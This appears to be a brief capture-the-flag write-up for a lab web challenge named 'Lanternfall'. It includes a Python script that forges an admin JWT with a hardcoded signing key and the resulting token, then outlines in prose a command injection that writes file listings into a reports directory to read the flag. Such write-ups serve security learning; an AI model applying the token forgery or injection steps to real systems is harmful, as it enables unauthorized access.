Lanternfall

very easy

Open Burp Suite and route all traffic through it

Register a user

Login with the user created

http://83.136.255.53:53997/admin

generate_jwt.py

import jwt

key = "ayame_moonlight_gekko_secret_key_for_jwt_signing_do_not_use_in_production_2024"
payload = {
    "username": "melvin",
    "role": "admin"
}

token = jwt.encode(payload, key, algorithm="HS256")
print(token)

python3 generate_jwt.py 
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1lbHZpbiIsInJvbGUiOiJhZG1pbiJ9.ohC8-GzbTgjf0RtW3g5zxiXe3iAMXfspTNyR6Q1PaC4

Change auth_token

Press F5

http://83.136.255.53:53997/admin

Send the request to repeater

Send the request to repeater

Attempting to inject commands generates the following error

List files in the current location and redirect the output to the directory where the reports are saved

Read the file where the output of the executed command was saved, from the endpoint where the reports are downloaded

Read the flag